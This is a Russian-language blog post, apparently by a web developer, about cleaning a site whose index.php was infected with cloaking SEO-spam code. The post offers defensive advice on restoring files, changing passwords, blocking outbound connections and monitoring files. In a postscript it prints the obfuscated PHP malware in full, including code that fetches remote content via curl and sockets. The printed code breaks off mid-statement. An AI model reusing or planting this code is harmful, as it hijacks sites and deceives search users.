Неочевидный взлом сайта

Иногда владелец сайта может даже не подозревать о том, что его сайт взломан. Он спокойно заходит на него, что-то делает, и при этом не выскакивает никаких окон, антивирусы не кричат о проблеме – в общем, все спокойно. Однако, это не всегда значит, что с вашим ресурсом все нормально. Иногда вредоносный код может выходить наружу только при некоторых обстоятельствах.

Как-то раз я решил проверить сайт заказчика, по каким запросам его находят в гугле. И был шокирован такой картиной:



Откуда эти иероглифы? Что это вообще за такое? Начинаем разбираться, почему гугл так отображает сайт. Пробуем просмотреть как Googlebot, и нам выдает такую вот картинку:



Какие то шины, ссылка и китайские или японские иероглифы вместо нормального контента. Ссылки ведут на сайт meikosoccer.jp. Переводить мы не будет – совсем неинтересно, да и зачастую сайт, на который ведет эта ссылка совсем не при чем. Будем искать, в чем дело и почему так происходит.

В этот раз искать долго не пришлось, вирус на сайте не очень и шифровался – он был в файле index.php – в самом начале. Вот код:

Разбирать этот код я не буду – и так видно, что просто подменяет страницы своими, и генерирует сотни новых при каждом обращении. Стоит отметить только наличие функции CURL – ниже поговорим, как защититься от этого. Удаляем этот код, а еще лучше – восстанавливаем все файлы с того времени, когда точно не было никакого вредоноса.

После этого меняем все пароли – на FTP, SSH, доступ к админке. Чтобы узнать, как именно произошел взлом, необходимо посмотреть логи доступа к сайту – по тому же протоколу FTP. Если ваш сайт не использует исходящие подключения – то заблокируйте их.

На некоторых хостингах вы можете указать IP-адреса или сети, с которых будет разрешен доступ по протоколу FTP. Если же у вас динамический IP, то можно задавать диапазоны адресов, которые используются вашим провайдером. В этом случае злоумышленник даже если и будет иметь правильный пароль к FTP, то при подключении увидит пустое место – никаких каталогов или файлов.

Теперь надо сообщить гуглу, что все в порядке. Для этого в Search Console заходим в Проблемы безопасности, ставим галку, что проблем устранены и отправляем запрос на перепроверку.



Что еще можно сделать, чтобы избежать взлома? Можно написать скрипт на PHP, который будет мониторить изменение важных файлов (например, по крону раз в час) и отправлять вам на почту. Под важными файлами понимаются индексная страница и конфигурационные (index.php, .htaccess, manager/index.php, config.php и так далее).

Если вы подозреваете (или уверены), что у вас на сайте поселился вирус, то вы всегда можете обратиться ко мне – я проведу проверку, чистку, а также приму ряд мер, чтобы обезопасить ваш ресурс от взлома.

P.S. Если кому интересно, то вот код этого вируса:

$OO_00O__O0='83';

$O_0_OO00O_='1';

$OO0O0_0__O='1';

$OOO_0_O0_0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C
%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O0O__0O_O0=$OOO_0_O0_0{16}.$OOO_0
_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{27}.$OOO_0_O0_0{29}.$OOO_0_O0_0{24}.$OOO_0_O0_
0{30}.$OOO_0_O0_0{16}.$OOO_0_O0_0{23}.$OOO_0_O0_0{6}.$OOO_0_O0_0{32}.$OOO_0_O0_0{30}
.$OOO_0_O0_0{29}.$OOO_0_O0_0{32}.$OOO_0_O0_0{6}.$OOO_0_O0_0{23}.$OOO_0_O0_0{23}.$OOO
_0_O0_0{3}.$OOO_0_O0_0{6}.$OOO_0_O0_0{32}.$OOO_0_O0_0{25};$OO0O00___O=$OOO_0_O0_0{33
}.$OOO_0_O0_0{10}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{6}.$OOO_0_O0_0{5}.$OOO
_0_O0_0{29}.$OOO_0_O0_0{33}.$OOO_0_O0_0{35}.$OOO_0_O0_0{32}.$OOO_0_O0_0{25}.$OOO_0_O0
_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{32}.$OOO_0_O0_0{23}.$OOO_0_O0_0{12
}.$OOO_0_O0_0{30}.$OOO_0_O0_0{0}.$OOO_0_O0_0{10};$O_OO__O000=$OOO_0_O0_0{33}.$OOO_0_O
0_0{10}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{6}.$OOO_0_O0_0{5}.$OOO_0_O0_0{29}
.$OOO_0_O0_0{27}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{5}.$OOO_
0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{6}.$OOO_0_O0_0{29}.$OOO_0_O0_0{26}.$OOO_0_O0_0
{6}.$OOO_0_O0_0{10}.$OOO_0_O0_0{6};$O0O__O_O00=$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0
_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{6}.$OOO_0_O0_0{5}.$OOO_0_O0_0{29}.$OOO_0_O0_0{3
3}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{3}.$OOO_0_O0_0{23}.$OO
O_0_O0_0{35}.$OOO_0_O0_0{32}.$OOO_0_O0_0{25}.$OOO_0_O0_0{12}.$OOO_0_O0_0{0}.$OOO_0_O
0_0{27};$OO_0__0O0O=$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$
OOO_0_O0_0{6}.$OOO_0_O0_0{5}.$OOO_0_O0_0{29}.$OOO_0_O0_0{33}.$OOO_0_O0_0{30}.$OOO_0_O
0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{10}.$OOO_0_O0_0{12}.$OOO_0_O0_0{5}.$OOO_0_O0_0{3
}.$OOO_0_O0_0{35}.$OOO_0_O0_0{18}.$OOO_0_O0_0{10};$O00_OOO0__=$OOO_0_O0_0{12}.$OOO_0_
O0_0{27}.$OOO_0_O0_0{0}.$OOO_0_O0_0{35}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{
29}.$OOO_0_O0_0{18}.$OOO_0_O0_0{33}.$OOO_0_O0_0{30}.$OOO_0_O0_0{24}.$OOO_0_O0_0{29}.
$OOO_0_O0_0{6}.$OOO_0_O0_0{3}.$OOO_0_O0_0{35}.$OOO_0_O0_0{24}.$OOO_0_O0_0{10};$O_O_0
O0O_0=$OOO_0_O0_0{38}.$OOO_0_O0_0{12}.$OOO_0_O0_0{23}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29
}.$OOO_0_O0_0{16}.$OOO_0_O0_0{18}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{32}.$
OOO_0_O0_0{35}.$OOO_0_O0_0{0}.$OOO_0_O0_0{10}.$OOO_0_O0_0{30}.$OOO_0_O0_0{0}.$OOO_0
_O0_0{10}.$OOO_0_O0_0{33};$OO_0O0_O0_=$OOO_0_O0_0{38}.$OOO_0_O0_0{12}.$OOO_0_O0_0{2
3}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29}.$OOO_0_O0_0{27}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.
$OOO_0_O0_0{29}.$OOO_0_O0_0{32}.$OOO_0_O0_0{35}.$OOO_0_O0_0{0}.$OOO_0_O0_0{10}.$OOO
_0_O0_0{30}.$OOO_0_O0_0{0}.$OOO_0_O0_0{10}.$OOO_0_O0_0{33};$OOO_00_0O_=$OOO_0_O0_0{
31}.$OOO_0_O0_0{10}.$OOO_0_O0_0{10}.$OOO_0_O0_0{16}.$OOO_0_O0_0{29}.$OOO_0_O0_0{3}.
$OOO_0_O0_0{18}.$OOO_0_O0_0{12}.$OOO_0_O0_0{23}.$OOO_0_O0_0{26}.$OOO_0_O0_0{29}.$OO
O_0_O0_0{19}.$OOO_0_O0_0{18}.$OOO_0_O0_0{30}.$OOO_0_O0_0{24}.$OOO_0_O0_0{20};$O__O0
O0O0_=$OOO_0_O0_0{38}.$OOO_0_O0_0{18}.$OOO_0_O0_0{0}.$OOO_0_O0_0{32}.$OOO_0_O0_0{10
}.$OOO_0_O0_0{12}.$OOO_0_O0_0{35}.$OOO_0_O0_0{0}.$OOO_0_O0_0{29}.$OOO_0_O0_0{30}.$O
OO_0_O0_0{17}.$OOO_0_O0_0{12}.$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0{33};$OO_0
O_00_O=$OOO_0_O0_0{30}.$OOO_0_O0_0{24}.$OOO_0_O0_0{24}.$OOO_0_O0_0{35}.$OOO_0_O0_0{
24}.$OOO_0_O0_0{29}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{16}.$OOO_0_O0_0{35}
.$OOO_0_O0_0{24}.$OOO_0_O0_0{10}.$OOO_0_O0_0{12}.$OOO_0_O0_0{0}.$OOO_0_O0_0{27};$O_
_O0O0_0O=$OOO_0_O0_0{32}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{6}.$OOO_0_O0_0
{10}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29}.$OOO_0_O0_0{38}.$OOO_0_O0_0{18}.$OOO_0_O0_0{0}
.$OOO_0_O0_0{32}.$OOO_0_O0_0{10}.$OOO_0_O0_0{12}.$OOO_0_O0_0{35}.$OOO_0_O0_0{0};$O0
__0OO_O0=$OOO_0_O0_0{33}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_
0{10}.$OOO_0_O0_0{12}.$OOO_0_O0_0{5}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29}.$OOO_0_O0_0{23
}.$OOO_0_O0_0{12}.$OOO_0_O0_0{5}.$OOO_0_O0_0{12}.$OOO_0_O0_0{10};$O_O0_0_OO0=$OOO_0
_O0_0{27}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{31}.$OOO_0_O0_0{35}.$OOO_0_O0
_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0{3}.$OOO_0_O0_0{20}.$OOO_0_O0_0{0}.$OOO_0_O0_0{6}
.$OOO_0_O0_0{5}.$OOO_0_O0_0{30};$O00__0O_OO=$OOO_0_O0_0{3}.$OOO_0_O0_0{6}.$OOO_0_O0
_0{33}.$OOO_0_O0_0{30}.$OOO_0_O0_0{22}.$OOO_0_O0_0{36}.$OOO_0_O0_0{29}.$OOO_0_O0_0{
26}.$OOO_0_O0_0{30}.$OOO_0_O0_0{32}.$OOO_0_O0_0{35}.$OOO_0_O0_0{26}.$OOO_0_O0_0{30}
;$O_O_O0O0_0=$OOO_0_O0_0{16}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{27}.$OOO_0
_O0_0{29}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO_0_O0_0{16}.$OOO_0_O0_0{23}.$OOO_0_O0
_0{6}.$OOO_0_O0_0{32}.$OOO_0_O0_0{30};$OO00_0OO__=$OOO_0_O0_0{38}.$OOO_0_O0_0{12}.$
OOO_0_O0_0{23}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29}.$OOO_0_O0_0{30}.$OOO_0_O0_0{17}.$OOO
_0_O0_0{12}.$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0{33};$O0_O0__0OO=$OOO_0_O0_0
{32}.$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.$OOO_0_O0_0{23}.$OOO_0_O0_0{29}.$OOO_0_O0_0{33
}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{35}.$OOO_0_O0_0{16}.$OOO_0_O0_0{10};$
O__OO00_0O=$OOO_0_O0_0{6}.$OOO_0_O0_0{24}.$OOO_0_O0_0{24}.$OOO_0_O0_0{6}.$OOO_0_O0_
0{20}.$OOO_0_O0_0{29}.$OOO_0_O0_0{33}.$OOO_0_O0_0{31}.$OOO_0_O0_0{12}.$OOO_0_O0_0{3
8}.$OOO_0_O0_0{10};$OO0OO_00__=$OOO_0_O0_0{16}.$OOO_0_O0_0{24}.$OOO_0_O0_0{30}.$OOO
_0_O0_0{27}.$OOO_0_O0_0{29}.$OOO_0_O0_0{5}.$OOO_0_O0_0{6}.$OOO_0_O0_0{10}.$OOO_0_O0
_0{32}.$OOO_0_O0_0{31};$O_O__O000O=$OOO_0_O0_0{32}.$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.
$OOO_0_O0_0{23}.$OOO_0_O0_0{29}.$OOO_0_O0_0{30}.$OOO_0_O0_0{24}.$OOO_0_O0_0{24}.$OO
O_0_O0_0{35}.$OOO_0_O0_0{24};$O0_0_OOO0_=$OOO_0_O0_0{32}.$OOO_0_O0_0{18}.$OOO_0_O0_
0{24}.$OOO_0_O0_0{23}.$OOO_0_O0_0{29}.$OOO_0_O0_0{32}.$OOO_0_O0_0{23}.$OOO_0_O0_0{3
5}.$OOO_0_O0_0{33}.$OOO_0_O0_0{30};$O0_0_O0O_O=$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.$OOO
_0_O0_0{23}.$OOO_0_O0_0{30}.$OOO_0_O0_0{0}.$OOO_0_O0_0{32}.$OOO_0_O0_0{35}.$OOO_0_O
0_0{26}.$OOO_0_O0_0{30};$O00OO__O0_=$OOO_0_O0_0{16}.$OOO_0_O0_0{6}.$OOO_0_O0_0{24}.
$OOO_0_O0_0{33}.$OOO_0_O0_0{30}.$OOO_0_O0_0{29}.$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.$OO
O_0_O0_0{23};$O___OO0O00=$OOO_0_O0_0{27}.$OOO_0_O0_0{2}.$OOO_0_O0_0{12}.$OOO_0_O0_0
{0}.$OOO_0_O0_0{38}.$OOO_0_O0_0{23}.$OOO_0_O0_0{6}.$OOO_0_O0_0{10}.$OOO_0_O0_0{30};
$O0_OOO0_0_=$OOO_0_O0_0{32}.$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.$OOO_0_O0_0{23}.$OOO_0_
O0_0{29}.$OOO_0_O0_0{12}.$OOO_0_O0_0{0}.$OOO_0_O0_0{12}.$OOO_0_O0_0{10};$O__OO000O_=$O
OO_0_O0_0{32}.$OOO_0_O0_0{18}.$OOO_0_O0_0{24}.$OOO_0_O0_0{23}.$OOO_0_O0_0{29}.$OOO_
0_O0_0{30}.$OOO_0_O0_0{17}.$OOO_0_O0_0{30}.$OOO_0_O0_0{32};$OO00O0O___=$OOO_0_O0_0{
12}.$OOO_0_O0_0{33}.$OOO_0_O0_0{29}.$OOO_0_O0_0{6}.$OOO_0_O0_0{24}.$OOO_0_O0_0{24}.
$OOO_0_O0_0{6}.$OOO_0_O0_0{20};$OOO__00O0_=$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O
0_0{24}.$OOO_0_O0_0{24}.$OOO_0_O0_0{16}.$OOO_0_O0_0{35}.$OOO_0_O0_0{33};$OO__O0O0_0=
$OOO_0_O0_0{5}.$OOO_0_O0_0{10}.$OOO_0_O0_0{29}.$OOO_0_O0_0{24}.$OOO_0_O0_0{6}.$OOO_0
_O0_0{0}.$OOO_0_O0_0{26};$OO_O0_0_O0=$OOO_0_O0_0{12}.$OOO_0_O0_0{5}.$OOO_0_O0_0{16}.
$OOO_0_O0_0{23}.$OOO_0_O0_0{35}.$OOO_0_O0_0{26}.$OOO_0_O0_0{30};$O_00OO_O0_=$OOO_0_O
0_0{30}.$OOO_0_O0_0{17}.$OOO_0_O0_0{16}.$OOO_0_O0_0{23}.$OOO_0_O0_0{35}.$OOO_0_O0_0{
26}.$OOO_0_O0_0{30};$OO0O_O0_0_=$OOO_0_O0_0{18}.$OOO_0_O0_0{33}.$OOO_0_O0_0{23}.$OOO
_0_O0_0{30}.$OOO_0_O0_0{30}.$OOO_0_O0_0{16};$O00_O_0OO_=$OOO_0_O0_0{18}.$OOO_0_O0_0{
0}.$OOO_0_O0_0{23}.$OOO_0_O0_0{12}.$OOO_0_O0_0{0}.$OOO_0_O0_0{25};$O_0O__O00O=$OOO_0
_O0_0{33}.$OOO_0_O0_0{18}.$OOO_0_O0_0{3}.$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0
{24};$O00OOO___0=$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0{24}.$OOO_0_O0_0{16}.$OO
O_0_O0_0{35}.$OOO_0_O0_0{33};$O00_OO__0O=$OOO_0_O0_0{33}.$OOO_0_O0_0{10}.$OOO_0_O0_0
{24}.$OOO_0_O0_0{23}.$OOO_0_O0_0{30}.$OOO_0_O0_0{0};$O00_0_OO_O=$OOO_0_O0_0{31}.$OOO
_0_O0_0{30}.$OOO_0_O0_0{17}.$OOO_0_O0_0{26}.$OOO_0_O0_0{30}.$OOO_0_O0_0{32};$OO00O_O
_0_=$OOO_0_O0_0{38}.$OOO_0_O0_0{34}.$OOO_0_O0_0{24}.$OOO_0_O0_0{12}.$OOO_0_O0_0{10}.
$OOO_0_O0_0{30};$O0_O__0OO0=$OOO_0_O0_0{38}.$OOO_0_O0_0{32}.$OOO_0_O0_0{23}.$OOO_0_O
0_0{35}.$OOO_0_O0_0{33}.$OOO_0_O0_0{30};$OO__O_000O=$OOO_0_O0_0{38}.$OOO_0_O0_0{24}.
$OOO_0_O0_0{30}.$OOO_0_O0_0{6}.$OOO_0_O0_0{26};$O_0_O_O0O0=$OOO_0_O0_0{38}.$OOO_0_O0
_0{27}.$OOO_0_O0_0{30}.$OOO_0_O0_0{10}.$OOO_0_O0_0{33};$O_0O_0_O0O=$OOO_0_O0_0{32}.$
OOO_0_O0_0{31}.$OOO_0_O0_0{5}.$OOO_0_O0_0{35}.$OOO_0_O0_0{26};$O00_0OO__O=$OOO_0_O0_
0{10}.$OOO_0_O0_0{24}.$OOO_0_O0_0{12}.$OOO_0_O0_0{5};$OOO0__O00_=$OOO_0_O0_0{41}.$OO
O_0_O0_0{35}.$OOO_0_O0_0{12}.$OOO_0_O0_0{0};$O_0OO_O_00=$OOO_0_O0_0{38}.$OOO_0_O0_0{
30}.$OOO_0_O0_0{35}.$OOO_0_O0_0{38};$O0_O_0_OO0=$OOO_0_O0_0{26}.$OOO_0_O0_0{6}.$OOO_
0_O0_0{10}.$OOO_0_O0_0{30};header('Content-Type:text/html;charset=utf-8');${"\x47\x4
c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x30\x30\x5f\x4f"](0);if(!function_
exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_re
place("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0O0O_O_0=${"\x47\x
4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x30\x4f"]('$url,$O0O00_O_
O_=0,$O0OOO_00__=1,$O_0OO_0O0_=NULL,$O0O__O_0O0=array()','if(!${"\x47\x4c\x4f\x42\x4
1\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x30\x30\x5f\x5f"]("/^http\\:\\/\\//si",$url)){
if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O0_O_O0O0_=${"\x47\x4c
\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'iy4tyhTkktKsovi
lXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O0_O_O0O0_.=$url;echo $O0_O_O0O0_;unset($O0_O_O0O0
_);exit();}return \'\';}$O0O___00OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\
x4f\x30\x5f\x30\x30\x4f\x5f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBL
O4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$O000__OO_O=$O__0O_0O0O=\'\';foreach(${"\x47
\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x5f\x4f\x30\x5f"](\'|\',$O0O___
00OO) as $c){$OO_O_O000_=1;if($O0O00_O_O_&&${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x
5f\x30\x4f\x5f\x5f\x4f\x30\x30\x4f"]($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x
4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x4f\x5f\x4f\x30\x5f"](\'+\',$c) as $d){if
(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x4f\x30\x5f"]($d))
{$OO_O_O000_=0;}}unset($d);if($OO_O_O000_){$O000__OO_O=$c;break;}}unset($O0O___00OO,
$c);if($O000__OO_O==\'\'){return 0;}if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x
30\x4f\x5f\x5f\x4f\x30\x30\x4f"]($O000__OO_O,0,1)==\'c\'){$O00OO__O_0=${"\x47\x4c\x4
f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x5f\x30\x5f"]();${"\x47\x4c\x4f\x4
2\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x5f\x30\x4f\x4f"]($O00OO__O_0,CURLOPT_URL,
$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x5f\x30\x4f\x4f"](
$O00OO__O_0,CURLOPT_USERAGENT,\'WHR\');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x
5f\x4f\x30\x5f\x5f\x30\x4f\x4f"]($O00OO__O_0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x
4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x5f\x30\x4f\x4f"]($O00OO__O_0,CURLOPT
_TIMEOUT,100);if($O0OOO_00__==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f
\x30\x5f\x5f\x30\x4f\x4f"]($O00OO__O_0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4
c\x53"}["\x4f\x4f\x30\x30\x4f\x30\x4f\x5f\x5f\x5f"]($O_0OO_0O0_)){${"\x47\x4c\x4f\x4
2\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x5f\x30\x4f\x4f"]($O00OO__O_0,CURLOPT_POST
FIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x30\x30\x5f\x30\x4f\x5f"]
($O_0OO_0O0_));}}$O0__00OOO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x4f
\x30\x30\x30\x4f\x5f"]($O00OO__O_0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\
x30\x5f\x4f\x4f\x4f\x30\x5f"]($O00OO__O_0);if(!$O0__00OOO_){if(isset(${"\x5f\x47\x45
\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O0_O_O0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53
"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\')
;$O0_O_O0O0_.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x5f\x4f\x30\x30\x3
0\x4f"]($O00OO__O_0);echo $O0_O_O0O0_;unset($O0_O_O0O0_);exit();}return 0;}else{$O0_
_00OOO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x4f\x4f\x5f\x5f\x4f"
](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x4f\x4f\x5f\x5f\x4f"]($O0_
_00OOO_,"\\xEF\\xBB\\xBF"));return $O0__00OOO_;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41
\x4c\x53"}["\x4f\x30\x30\x4f\x4f\x5f\x5f\x4f\x30\x5f"]($url);isset($O0_O_0_O0O["\x68
\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\
"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x5f\x4f\x30\x4f
\x5f\x4f\x30\x30\x5f"])||$O0_O_0_O0O["\x4f\x5f\x4f\x30\x4f\x5f\x4f\x30\x30\x5f"]=\'\';
$O00O_O0O__=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O
0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$O0O0
O__O0_=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'h
ttps\'){$O_O0_00O_O=\'1.1\';$O_O0O_O00_=empty($O0_O_0_O0O["\x4f\x5f\x4f\x30\x4f\x5f\x4
f\x30\x30\x5f"])?443:$O0_O_0_O0O["\x4f\x5f\x4f\x30\x4f\x5f\x4f\x30\x30\x5f"];$O0O0O__O
0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'Ky7
OshTdLtPXBwA=\');$O0O0O__O0_.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O_O0_00O_O=\'1.0\
';$O_O0O_O00_=empty($O0_O_0_O0O["\x4f\x5f\x4f\x30\x4f\x5f\x4f\x30\x30\x5f"])?80:$O0_O_
0_O0O["\x4f\x5f\x4f\x30\x4f\x5f\x4f\x30\x30\x5f"];}$OO00___0OO=\'Host:\';$OO00___0OO.=
$O0O0O__O0_;$O0O__O_0O0[]=$OO00___0OO;$O0O__O_0O0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}[
"\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$O0O__O_
0O0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'
Cy1OLhTdJ1TE/NK7EK9wgtPCAA==\');$O0O__O_0O0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\
x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'c0xOThTi0osdLtPS1wIA\');unset($OO00___0OO);if(
$O0OOO_00__==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x4f\x30\x4f\x5f
\x5f\x5f"]($O_0OO_0O0_)){$O_0OO_0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x
5f\x30\x30\x5f\x30\x4f\x5f"]($O_0OO_0O0_);}$O0O__O_0O0[]=${"\x47\x4c\x4f\x42\x41\x4c\x
53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP0
6/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$O0O__O_0O0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["
\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x
4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x30\x4f"]($O_0OO_0O0_);$O__
0O_0O0O="POST $O00O_O0O__ HTTP/$O_O0_00O_O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\
x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x30\x5f"]("\\r\\n",$O0O__O_0O0)."\\r\\n\\r\\n".$O_0OO_
0O0_;unset($O_0OO_0O0_);}else{$O__0O_0O0O="GET $O00O_O0O__ HTTP/$O_O0_00O_O\\r\\n".${"
\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x30\x5f"]("\\r\\n",$O
0O__O_0O0)."\\r\\n\\r\\n";}unset($O0O__O_0O0,$O0_O_0_O0O,$O_O0_00O_O,$O00O_O0O__);$O_O
_OO_000=null;if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x5f\x4f\x30\x3
0\x4f"]($O000__OO_O,-1)==\'n\'){$O_O_OO_000=$O000__OO_O($O0O0O__O0_,$O_O0O_O00_,$O0_O_
O0O0_no,$O0_O_O0O0_str,30);}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4
f\x5f\x5f\x4f\x30\x30\x4f"]($O000__OO_O,-1)==\'t\'){$O0_0OO_O_0=${"\x47\x4c\x4f\x42\x4
1\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x5f\x30\x30\x4f\x5f"](\'K0kushTNLtPXBwA=\');$O0_0OO_
O_0.=$O0O0O__O0_;$O0_0OO_O_0.=\':\';$O0_0OO_O_0.=$O_O0O_O00_;$O_O_OO_000=${"\x47\x4c\x
4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x30\x5f\x5f\x5f\x4f"]($O0_0OO_O_0,$O0_O_O0O
0_no,$O0_O_O0O0_str,30);unset($O0_0OO_O_0);}}$OOO0_0__0O=\'\';if($O_O_OO_000){${"\x47\
x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x4f\x5f\x4f\x30\x30"]($O_O_OO_000,true
